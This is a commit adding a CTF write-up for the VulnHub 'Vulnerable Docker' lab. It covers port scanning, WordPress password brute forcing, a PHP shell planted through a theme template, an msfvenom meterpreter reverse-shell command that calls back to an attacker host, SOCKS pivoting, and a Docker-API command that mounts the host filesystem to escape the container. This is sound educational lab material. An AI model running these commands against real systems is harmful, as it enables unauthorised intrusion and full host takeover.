mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 21:03:07 +00:00
Add files via upload
This commit is contained in:
parent
291a84dd2b
commit
44155ca6c0
1 changed files with 164 additions and 0 deletions
164
VulnHub/Vulnerable_docker.md
Normal file
164
VulnHub/Vulnerable_docker.md
Normal file
|
@ -0,0 +1,164 @@
|
|||
# Vulnhub- Vulnerable Docker (Easy)
|
||||
|
||||
<img src="https://imgur.com/h5mOkkp.png"/>
|
||||
|
||||
We don't need to use `netdiscover` or any other tool to get IP of the box since it already shows at login banner
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
nmap -p- -sC -sV <ip>
|
||||
|
||||
PORT STATE SERVICE VERSION
|
||||
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
|
||||
| ssh-hostkey:
|
||||
| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
|
||||
| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
|
||||
| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|
||||
|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
|
||||
2375/tcp open docker Docker 17.06.0-ce
|
||||
| docker-version:
|
||||
| BuildTime: 2017-06-23T21:17:13.228983331+00:00
|
||||
| Arch: amd64
|
||||
| KernelVersion: 3.13.0-128-generic
|
||||
| ApiVersion: 1.30
|
||||
| MinAPIVersion: 1.12
|
||||
| GitCommit: 02c1d87
|
||||
| Version: 17.06.0-ce
|
||||
| GoVersion: go1.8.3
|
||||
|_ Os: linux
|
||||
| fingerprint-strings:
|
||||
| FourOhFourRequest:
|
||||
| HTTP/1.0 404 Not Found
|
||||
| Content-Type: application/json
|
||||
| Date: Wed, 24 Mar 2021 18:06:13 GMT
|
||||
| Content-Length: 29
|
||||
| {"message":"page not found"}
|
||||
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|
||||
| HTTP/1.1 400 Bad Request
|
||||
| Content-Type: text/plain; charset=utf-8
|
||||
| Connection: close
|
||||
| Request
|
||||
| GetRequest:
|
||||
| HTTP/1.0 404 Not Found
|
||||
| Content-Type: application/json
|
||||
| Date: Wed, 24 Mar 2021 18:05:48 GMT
|
||||
| Content-Length: 29
|
||||
| {"message":"page not found"}
|
||||
| HTTPOptions:
|
||||
| HTTP/1.0 200 OK
|
||||
| Api-Version: 1.30
|
||||
| Docker-Experimental: false
|
||||
| Ostype: linux
|
||||
| Server: Docker/17.06.0-ce (linux)
|
||||
| Date: Wed, 24 Mar 2021 18:05:48 GMT
|
||||
| Content-Length: 0
|
||||
| Content-Type: text/plain; charset=utf-8
|
||||
| docker:
|
||||
| HTTP/1.1 400 Bad Request: missing required Host header
|
||||
| Content-Type: text/plain; charset=utf-8
|
||||
| Connection: close
|
||||
|_ Request: missing required Host header
|
||||
8000/tcp open http Apache httpd 2.4.10 ((Debian))
|
||||
|_http-generator: WordPress 4.8.1
|
||||
| http-robots.txt: 1 disallowed entry
|
||||
|_/wp-admin/
|
||||
|_http-server-header: Apache/2.4.10 (Debian)
|
||||
|_http-title: NotSoEasy Docker – Just another WordPress site
|
||||
MAC Address: 08:00:27:D7:94:9E (Oracle VirtualBox virtual NIC)
|
||||
```
|
||||
|
||||
|
||||
## PORT 2375 (Docker)
|
||||
|
||||
Since docker api is exposed we can try connecting to port by listing images
|
||||
|
||||
<img src="https://imgur.com/hnjrDSL.png"/>
|
||||
|
||||
We can also see which containers are currently running
|
||||
|
||||
<img src="https://imgur.com/YxHjEAB.png"/>
|
||||
|
||||
|
||||
wordpress:WordPressISBest
|
||||
|
||||
## PORT 8000
|
||||
|
||||
<img src="https://imgur.com/guNMn4m.png"/>
|
||||
|
||||
|
||||
<img src="https://imgur.com/OqNbLSP.png"/>
|
||||
|
||||
Running `wpscan`
|
||||
|
||||
<img src="https://imgur.com/Hk25WEl.png"/>
|
||||
|
||||
<img src="https://imgur.com/XssFFIb.png"/>
|
||||
|
||||
We can now bruteforce the password for `bob`
|
||||
|
||||
<img src="https://imgur.com/ixKiiIJ.png"/>
|
||||
|
||||
<img src="https://imgur.com/BFwRiFu.png"/>
|
||||
|
||||
Using these credentials we can login to wordpress site
|
||||
|
||||
<img src="https://imgur.com/I78p0Dv.png"/>
|
||||
|
||||
To get a shelll we can edit `404.php` template of the currently active theme
|
||||
|
||||
<img src="https://imgur.com/MDkzO7n.png"/>
|
||||
|
||||
<img src="https://imgur.com/fm1m8AZ.png"/>
|
||||
|
||||
Alternatively you can get a meterpreter shell my generating a payload with `msfvenom`
|
||||
|
||||
<img src="https://imgur.com/89Ia2QK.png"/>
|
||||
|
||||
<img src="https://imgur.com/bOD2D65.png"/>
|
||||
|
||||
<img src="https://imgur.com/4cL3cLZ.png"/>
|
||||
|
||||
Now in order to do pivoting web shell are not stable (in both windows and linux ) so after we got the intial foothold we may need to stablize our shell in meterpreter we have to sepefically generate a linux payload
|
||||
|
||||
`msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f elf > shell.elf`
|
||||
|
||||
<img src="https://imgur.com/92q68tm.png"/>
|
||||
|
||||
<img src="https://imgur.com/ugE5apb.png"/>
|
||||
|
||||
### Unstable shell
|
||||
|
||||
<img src="https://imgur.com/ERLhjBU.png"/>
|
||||
|
||||
### New meterpreter shell
|
||||
|
||||
<img src="https://imgur.com/7IsF5dj.png"/>
|
||||
|
||||
<img src="https://imgur.com/tXpFMT8.png"/>
|
||||
|
||||
Now we have added the route to subnet `172.18.0.0` for docker container , we can now scan for open ports on the container and since there are more as we saw from enumerating docker port
|
||||
|
||||
<img src="https://imgur.com/B5c7GUq.png"/>
|
||||
|
||||
Start `socks4a proxy`
|
||||
|
||||
<img src="https://imgur.com/rjsvdRF.png"/>
|
||||
|
||||
Use `foxyproxy` to switch to socks4a proxy and since port 8022 is open we can see what's there
|
||||
|
||||
<img src="https://imgur.com/cCbqScc.png"/>
|
||||
|
||||
<img src="https://imgur.com/fuZoPcy.png"/>
|
||||
|
||||
<img src="https://imgur.com/wwDahXe.png"/>
|
||||
|
||||
This container has `docker.sock` which allows to communicate with docker meaning creating , adding ,deleting container so there's a trick to mount the host system on the docker container by uploading `docker` and run command `docker run -it -v /:/host/ <container_name> chroot /host/ bash ` binary instead we have docker port and we can access those container so we can remotely do this
|
||||
|
||||
`docker -H tcp://192.168.1.7:2375 run --rm -it -v /:/host wordpress chroot /host bash`
|
||||
|
||||
<img src="https://imgur.com/oSqmaSo.png"/>
|
||||
|
||||
And we can read the the flag which means we are on a host machine
|
||||
|
||||
<img src="https://imgur.com/CiZFvRi.png"/>
|
Loading…
Reference in a new issue